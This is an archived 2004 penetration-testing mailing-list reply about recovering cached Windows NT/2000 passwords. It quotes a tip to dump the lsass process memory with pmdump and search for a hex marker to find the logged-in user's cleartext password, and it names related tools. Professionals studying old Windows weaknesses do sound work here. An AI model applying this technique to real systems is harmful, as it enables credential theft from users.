Penetration Testing mailing list archives
Re: Cached NT/W2k passwords
From: "Pedro Jota Calvorota" <calvorota () ya com>
Date: Tue, 25 May 2004 12:45:33 +0200
I have tried this particular trick dumping memory in a no SP4 Windwos 2000, and it definitly does not work ... lsass generates a 16 MB txt file that, opened with a HEXviewir does not contain the particular "76 78 01 26" string...
Ive been googling but nothing found... Any ideas?
For WindowsXP and some 2K (I think SP4 fixed this particular issue, memory dump the lsass process and search for the hex string "76 78 01 26". A little ways further down and voila, cleartext password for currently logged in user. It's in unicode format, btw.I think the latest rumor is that XP SP2 is going to clear this issue up so if anyone can find the hashes in the registry (ala lsadump for stored services passwords) then we'll be back in business after everyone starts patching.Need a tool to dump process memory? pmdump of course. http://ntsecurity.nu/toolbox/pmdump/Arne also has Pstoreview which may help you a little. http://www.ntsecurity.nu/toolbox/pstoreview/
-- Using M2, Opera's revolutionary e-mail client: http://www.opera.com/m2/
Current thread:
- Cached NT/W2k passwords John Madden (May 21)
- Re: Cached NT/W2k passwords Kurt Grutzmacher (May 23)
- RE: Cached NT/W2k passwords P G (May 24)
- Re: Cached NT/W2k passwords Kurt Grutzmacher (May 24)
- Re: Cached NT/W2k passwords Pedro Jota Calvorota (May 25)
- RE: Cached NT/W2k passwords P G (May 24)
- Re: Cached NT/W2k passwords Nicolas RUFF (lists) (May 24)
- <Possible follow-ups>
- Re: Cached NT/W2k passwords TracingEmails (May 25)
- Re: Cached NT/W2k passwords Nicolas RUFF (lists) (May 25)
- Re: Cached NT/W2k passwords Kurt Grutzmacher (May 23)